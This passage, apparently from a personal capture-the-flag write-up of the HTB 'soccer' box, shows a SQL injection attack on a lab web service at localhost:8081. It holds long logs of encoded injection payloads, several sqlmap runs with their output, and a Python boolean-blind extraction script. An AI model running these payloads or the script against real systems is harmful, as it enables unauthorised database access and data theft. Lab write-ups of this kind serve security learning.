/?id=1%27%29%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27CJRP%27%3D%27CJRP HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:41:13] "GET /?id=1%27%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27Jjgq%27%3D%27Jjgq HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:41:18] "GET /?id=1%29%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%287785%3D7785 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:41:21] "GET /?id=1%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:41:25] "GET /?id=1%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29--%20nGvp HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:41:29] "GET /?id=1%27%29%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%28%27fmfX%27%3D%27fmfX HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:41:32] "GET /?id=1%27%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%27wOSp%27%3D%27wOSp HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:41:35] "GET /?id=1%29%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%288326%3D8326 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:41:44] "GET /?id=1%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:41:49] "GET /?id=1%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20iGwg HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:41:53] "GET /?id=1%27%29%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27XKdT%27%3D%27XKdT HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:41:58] "GET /?id=1%27%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27QHru%27%3D%27QHru HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:42:04] "GET /?id=%28SELECT%20CONCAT%28CONCAT%28%27qkbzq%27%2C%28CASE%20WHEN%20%288028%3D8028%29%20THEN%20%271%27%20ELSE%20%270%27%20END%29%29%2C%27qqjjq%27%29%29 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:42:09] "GET /?id=1 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:42:13] "GET /?id=1%29%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:42:22] "GET /?id=1%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:42:28] "GET /?id=1%27%29%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:42:32] "GET /?id=1%27%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:42:36] "GET /?id=1%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:42:40] "GET /?id=1%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:42:44] "GET /?id=1%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:42:49] "GET /?id=1%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:42:58] "GET /?id=1%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2876%29%7C%7CCHR%2877%29%7C%7CCHR%28105%29%7C%7CCHR%28113%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:43:04] "GET /?id=1%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2876%29%7C%7CCHR%2877%29%7C%7CCHR%28105%29%7C%7CCHR%28113%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:43:09] "GET /?id=1%27%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2876%29%7C%7CCHR%2877%29%7C%7CCHR%28105%29%7C%7CCHR%28113%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:43:16] "GET /?id=1%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2876%29%7C%7CCHR%2877%29%7C%7CCHR%28105%29%7C%7CCHR%28113%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:43:20] "GET /?id=1%29%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29%20AND%20%284161%3D4161 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:43:30] "GET /?id=1%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:43:39] "GET /?id=1%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29--%20pyzB HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:43:47] "GET /?id=1%27%29%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29%20AND%20%28%27awGX%27%3D%27awGX HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:43:51] "GET /?id=1%27%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29%20AND%20%27MsuW%27%3D%27MsuW HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:43:54] "GET /?id=1%29%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29%20AND%20%283450%3D3450 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:43:58] "GET /?id=1%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:44:05] "GET /?id=1%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29--%20aLXw HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:44:09] "GET /?id=1%27%29%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27pHJg%27%3D%27pHJg HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:44:13] "GET /?id=1%27%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29%20AND%20%27sugF%27%3D%27sugF HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:44:17] "GET /?id=1%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%282874%3D2874 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:44:21] "GET /?id=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:44:25] "GET /?id=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20LcPO HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:44:29] "GET /?id=1%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%28%27Fvna%27%3D%27Fvna HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:44:33] "GET /?id=1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27AxHq%27%3D%27AxHq HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:44:37] "GET /?id=1%29%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29%20AND%20%283643%3D3643 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:44:44] "GET /?id=1%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:44:48] "GET /?id=1%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29--%20uMol HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:44:52] "GET /?id=1%27%29%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29%20AND%20%28%27GqHt%27%3D%27GqHt HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:44:56] "GET /?id=1%27%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29%20AND%20%27vniL%27%3D%27vniL HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:46:18] "GET /?id=1%29%20ORDER%20BY%201--%20eAYw HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:46:23] "GET /?id=1%29%20ORDER%20BY%204299--%20HCGh HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:46:35] "GET /?id=1%20ORDER%20BY%201--%20uOLG HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:46:58] "GET /?id=1%20ORDER%20BY%205403--%20kRXS HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:47:12] "GET /?id=1%20ORDER%20BY%201--%20viPb HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:47:24] "GET /?id=1%20ORDER%20BY%201950--%20hLcp HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:47:28] "GET /?id=1%27%29%20ORDER%20BY%201--%20CevJ HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:47:32] "GET /?id=1%27%29%20ORDER%20BY%204026--%20LUYc HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:47:36] "GET /?id=1%27%20ORDER%20BY%201--%20SMzk HTTP/1.1" 200 -try op by hand
for this i try sqlmap manymany times,but i can’t get the data
┌──(kwkl㉿kwkl)-[~]└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B ___ __H__ ___ ___[.]_____ ___ ___ {1.7.2#stable} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 12:49:15 /2023-03-19/[12:49:15] [INFO] testing connection to the target URL[12:49:20] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')[12:49:20] [INFO] testing if the target URL content is stable[12:49:24] [INFO] target URL content is stable[12:49:27] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable[12:49:30] [INFO] testing for SQL injection on GET parameter 'id'[12:49:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[12:49:50] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'[12:49:53] [WARNING] GET parameter 'id' does not seem to be injectable[12:49:53] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent' [*] ending @ 12:49:53 /2023-03-19/ ┌──(kwkl㉿kwkl)-[~]└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --level 5 ___ __H__ ___ ___[,]_____ ___ ___ {1.7.2#stable} |_ -| . ['] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 12:50:02 /2023-03-19/[12:50:02] [INFO] testing connection to the target URL[12:50:05] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')[12:50:05] [INFO] testing if the target URL content is stable[12:50:08] [INFO] target URL content is stable[12:50:12] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable[12:50:15] [INFO] testing for SQL injection on GET parameter 'id'[12:50:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[12:50:41] [WARNING] user aborted during detection phasehow do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] quit[12:50:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'[12:50:50] [WARNING] user aborted during detection phasequit[12:50:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'[12:50:59] [WARNING] user aborted during detection phasehow do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] quit[12:51:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'[12:51:02] [WARNING] user aborted during detection phasehow do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] S[12:51:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'[12:51:05] [WARNING] user aborted during detection phasehow do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] [12:51:06] [ERROR] user quit[*] ending @ 12:51:06 /2023-03-19so i try python bool blind injection
# -*- coding: utf-8 -*-import requestsimport stringurl = "http://localhost:8081?id=1"#mark = "Ticket Exists"notmark="Doesn't"mark="Ticket Exists"database = ''for i in range(1, 25): for j in string.ascii_letters: target = url + ' '+' or if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables)) --;' % (i, j) r = requests.get(target) if notmark not in r.text: database += j print(database) print(r.text) breakprint('Database:', database)┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]└─$ python3 bool4soc\ copy.py 1 ⨯sTicket ExistssoTicket ExistssocTicket ExistssoccTicket ExistssocceTicket ExistssoccerTicket ExistssoccerdTicket ExistssoccerdbTicket ExistsThese results make me confident that i can sqlmap it
so i try the command
┌──(kwkl㉿kwkl)-[~]└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists" ___ __H__ ___ ___[,]_____ ___ ___ {1.7.2#stable} |_ -| . [,] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 13:24:33 /2023-03-19/[13:24:33] [INFO] testing connection to the target URL[13:24:39] [INFO] testing if the provided string is within the target URL page content[13:24:39] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway[13:24:39] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')[13:24:43] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable[13:24:46] [INFO] testing for SQL injection on GET parameter 'id'[13:24:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[13:25:24] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'[13:25:47] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable [13:27:11] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] n[13:35:36] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval[13:35:36] [INFO] checking if the injection point on GET parameter 'id' is a false positiveGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-6478 OR 1585=1585---[13:36:30] [INFO] testing MySQL[13:36:36] [INFO] confirming MySQL[13:36:43] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 8.0.0[13:37:00] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'[*] ending @ 13:37:00 /2023-03-19/continue to try it is too slow
┌──(kwkl㉿kwkl)-[~]└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists" ___ __H__ ___ ___[,]_____ ___ ___ {1.7.2#stable} |_ -| . [,] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 13:24:33 /2023-03-19/[13:24:33] [INFO] testing connection to the target URL[13:24:39] [INFO] testing if the provided string is within the target URL page content[13:24:39] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway[13:24:39] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')[13:24:43] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable[13:24:46] [INFO] testing for SQL injection on GET parameter 'id'[13:24:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[13:25:24] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'[13:25:47] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable [13:27:11] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] n[13:35:36] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval[13:35:36] [INFO] checking if the injection point on GET parameter 'id' is a false positiveGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-6478 OR 1585=1585---[13:36:30] [INFO] testing MySQL[13:36:36] [INFO] confirming MySQL[13:36:43] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 8.0.0[13:37:00] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'[*] ending @ 13:37:00 /2023-03-19/ ┌──(kwkl㉿kwkl)-[~]└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists" --dbs ___ __H__ ___ ___[,]_____ ___ ___ {1.7.2#stable} |_ -| . ['] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 13:40:04 /2023-03-19/[13:40:04] [INFO] resuming back-end DBMS 'mysql' [13:40:04] [INFO] testing connection to the target URL[13:40:07] [INFO] testing if the provided string is within the target URL page content[13:40:07] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway[13:40:07] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-6478 OR 1585=1585---[13:40:07] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 8[13:40:07] [INFO] fetching database names[13:40:07] [INFO] fetching number of databases[13:40:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[13:40:14] [INFO] retrieved: 5[13:40:40] [INFO] retrieved: mys^C[*] ending @ 13:42:09 /2023-03-19/ ┌──(kwkl㉿kwkl)-[~]└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists" -D soccerdb --tables ___ __H__ ___ ___[)]_____ ___ ___ {1.7.2#stable} |_ -| . [.] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 13:42:22 /2023-03-19/[13:42:22] [INFO] resuming back-end DBMS 'mysql' [13:42:22] [INFO] testing connection to the target URL[13:42:25] [INFO] testing if the provided string is within the target URL page content[13:42:25] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway[13:42:25] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-6478 OR 1585=1585---[13:42:25] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 8[13:42:25] [INFO] fetching tables for database: 'soccerdb'[13:42:25] [INFO] fetching number of tables for database 'soccerdb'[13:42:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[13:42:28] [INFO] retrieved: 0[13:42:56] [WARNING] database 'soccerdb' appears to be empty[13:42:56] [ERROR] unable to retrieve the table names for any databasedo you want to use common table existence check? [y/N/q] ywhich common tables (wordlist) file do you want to use?[1] default '/usr/share/sqlmap/data/txt/common-tables.txt' (press Enter)[2] custom> [13:43:06] [INFO] performing table existence using items from '/usr/share/sqlmap/data/txt/common-tables.txt'[13:43:06] [INFO] adding words used on web page to the check list[13:43:06] [INFO] checking database 'soccerdb'please enter number of threads? [Enter for 1 (current)] [13:43:11] [WARNING] running in a single-thread mode. This could take a while [13:43:27] [WARNING] no table(s) found for database 'soccerdb'No tables found[13:43:27] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'[*] ending @ 13:43:27 /2023-03-19/ ┌──(kwkl㉿kwkl)-[~]└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists" --dump-all ___ __H__ ___ ___[,]_____ ___ ___ {1.7.2#stable} |_ -| . ["] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 13:43:34 /2023-03-19/[13:43:34] [INFO] resuming back-end DBMS 'mysql' [13:43:34] [INFO] testing connection to the target URL[13:43:37] [INFO] testing if the provided string is within the target URL page content[13:43:37] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway[13:43:37] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-6478 OR 1585=1585---[13:43:37] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 8[13:43:37] [INFO] sqlmap will dump entries of all tables from all databases now[13:43:37] [INFO] fetching database names[13:43:37] [INFO] fetching number of databases[13:43:41] [INFO] resumed: 5[13:43:41] [INFO] resuming partial value: mys[13:43:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[13:43:41] [INFO] 